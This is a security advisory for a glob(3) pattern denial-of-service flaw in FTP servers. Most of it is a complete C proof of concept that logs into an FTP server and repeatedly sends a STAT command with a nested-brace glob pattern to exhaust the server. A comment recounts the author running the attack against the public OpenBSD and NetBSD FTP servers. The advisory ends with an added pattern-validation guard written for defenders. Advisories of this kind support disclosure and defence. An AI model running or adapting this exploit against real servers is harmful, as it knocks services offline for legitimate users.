GNU libc glob(3) "pattern" Remote Denial of Service Vulnerability
Published: 2011-05-02    Updated: 2011-05-02

Affected systems:
NetBSD NetBSD 5.1

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 47671
CVE ID: CVE-2011-0418

glibc is the C library implementation used by the vast majority of Linux operating systems.

GNU libc's glob(3) implementation contains a "pattern" remote denial-of-service vulnerability. A remote attacker can exploit it to make the affected machine stop responding, denying service to legitimate users. The PoC below reaches glob(3) through an FTP server that passes a client-supplied pattern of nested brace groups and wildcards to it.

<* Source: Maksymilian Arciemowicz (max@jestsuper.pl) *>

Test method:
--------------------------------------------------------------------------------

WARNING: the following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>        /* sleep() */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

/*
PoC for multiple vendors ftpd (libc/glob) resource exhaustion [CVE-2010-2632]

Affected Software (verified):
- OpenBSD 4.7
- NetBSD 5.0.2
- FreeBSD 7.3/8.1
- Oracle Sun Solaris 10

Affected Vendors (not verified):
- GNU Libc (glibc)
- Apple
- Microsoft
- HP
- more

Credit: Maksymilian Arciemowicz cxib I securityreason J com

Note: With a similar script written in php (this same pattern), we have attacked OpenBSD/NetBSD servers with result:

- ftp.openbsd.org: Connection refused

and in the end of attack

# telnet ftp.openbsd.org 21
Trying 129.128.5.191...
Connected to ftp.openbsd.org.
Escape character is '^]'.
421- If you are seeing this message you have been blocked from using
421- this ftp server - most likely for mirroring content without paying
421- attention to what you were mirroring or where you should be mirroring
421- it from, or for excessive connection rates.
421- OpenBSD should *NOT* be mirrored from here, you should use
421- a second level mirror as described in http://www.openbsd.org/ftp.html
421
Connection closed by foreign host.
#

- ftp.netbsd.org: no more access for anonymous =>

---
On 02.07.2010 20:29 CET, ftp.netbsd.org has return:
530 User ftp access denied, connection limit of 160 reached.
---

and in the end, deny for my host.
*/

/* Send one FTP command string and clear the buffer afterwards. */
void sendftp(int stream, char *what)
{
    if (-1 == send(stream, what, strlen(what), 0))
        printf("Can't send %s\n", what);
    else
        printf("send: %s\n", what);
    bzero(what, strlen(what));
}

/* Read up to len-1 bytes of server reply and print it as a string. */
void readftp(int stream, int len)
{
    char readline[len];
    memset(readline, 0, len);                    /* keep the reply NUL-terminated */
    if (recv(stream, readline, len - 1, 0) < 1)
        printf("Can't read from stream\n");
    else
        printf("recv: %s\n", readline);
}

/* Connect, log in, and send a single STAT command carrying the glob pattern.
 * The socket is deliberately left open, as in the original PoC. */
void sendstat(char *host, char *port, char *login, char *pass, char *pattern)
{
    char buffer[1024];                           // ftp command buffer
    int sockfd, error;
    struct addrinfo hints;
    struct addrinfo *res0;

    memset(&hints, 0, sizeof(hints));
    hints.ai_family = PF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    error = getaddrinfo(host, port, &hints, &res0);
    if (error)
        goto errorcon;
    if ((sockfd = socket(res0->ai_family, res0->ai_socktype, res0->ai_protocol)) < 0)
        goto errorcon;
    if (-1 == connect(sockfd, res0->ai_addr, res0->ai_addrlen))
        goto errorcon;

    readftp(sockfd, 1024);                       // server banner
    snprintf(buffer, 1024, "USER %s\nPASS %s\n", login, pass);
    sendftp(sockfd, buffer);
    readftp(sockfd, 1024);
    bzero(buffer, 1024);
    snprintf(buffer, 1024, "stat %s\n", pattern); // STAT makes ftpd glob(3) the argument
    sendftp(sockfd, buffer);
    freeaddrinfo(res0);
    return;

errorcon:
    printf("Can't connect, exit\n");
    exit(1);
}

int main(int argc, char *argv[])
{
    /* Eleven brace groups of three alternatives, each followed by a "*" component:
     * glob(3) expands this into 3^11 = 177147 patterns, and every one of them
     * walks a directory for each "*", which is what exhausts the server. */
    char pattern[1024] = "{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*cx"; // some servers support only 1024
    char *login, *pass;
    char logindef[] = "anonymous", passdef[] = "cve_2010_2632@127.0.0.1";

    printf("This is exploit for CVE-2010-2632 (libc/glob)\nby Maksymilian Arciemowicz\n");
    if (argc < 3) {
        printf("Use: ./exploit host port [username] [password]\nhost and port are required\n");
        exit(1);
    }
    char *host = argv[1];
    char *port = argv[2];
    if (4 <= argc) login = argv[3]; else login = logindef;
    if (5 <= argc) pass = argv[4]; else pass = passdef;

    while (1) {
        printf("----------------------------- next\n");
        sendstat(host, port, login, pass, pattern);
        sleep(3);                                // some delay to be sure
    }
    return 0;                                    // never happens
}

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

NetBSD
------
The vendor has already released an upgrade patch to fix this security issue; download it from the vendor's homepage:

http://www.netbsd.org/Security/
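A defensive counterpart, added here as an example and not part of the advisory or of Arciemowicz's PoC: before a service such as ftpd hands a client-supplied pattern to glob(3), it can refuse patterns whose expansion cost is unbounded, independently of any limit the libc itself enforces. The thresholds and the helper names (pattern_is_safe, guarded_glob) are assumptions chosen for illustration.

```c
#include <glob.h>
#include <stdbool.h>
#include <string.h>

/* Illustrative thresholds (assumptions, not values taken from any vendor fix). */
#define MAX_PATTERN_LEN     256
#define MAX_WILDCARDS         8   /* total '*', '?' and '[' allowed */
#define MAX_WILD_COMPONENTS   2   /* path components containing a wildcard */

/* Returns true when a client-supplied pattern is cheap enough to hand to glob(3).
 * Brace expansion is refused outright: every "{a,b,c}" multiplies the patterns
 * glob must walk, and chained with per-component "*" scans that is what the
 * PoC pattern relies on. */
bool pattern_is_safe(const char *pat)
{
    size_t len = strlen(pat);
    if (len == 0 || len > MAX_PATTERN_LEN)
        return false;
    int wildcards = 0, wild_components = 0;
    bool component_has_wild = false;
    for (size_t i = 0; i < len; i++) {
        char c = pat[i];
        if (c == '\\') {            /* backslash escape: the next char is literal */
            i++;
            continue;
        }
        if (c == '{')               /* no brace expansion at all */
            return false;
        if (c == '*' || c == '?' || c == '[') {
            wildcards++;
            component_has_wild = true;
        } else if (c == '/') {
            if (component_has_wild)
                wild_components++;
            component_has_wild = false;
        }
    }
    if (component_has_wild)
        wild_components++;
    return wildcards <= MAX_WILDCARDS &&
           wild_components <= MAX_WILD_COMPONENTS;
}

/* What a server would call instead of glob(): a rejected pattern returns -1
 * without touching the filesystem, otherwise glob()'s own return value. */
int guarded_glob(const char *pat, glob_t *g)
{
    if (!pattern_is_safe(pat))
        return -1;
    return glob(pat, GLOB_NOSORT, NULL, g);
}
```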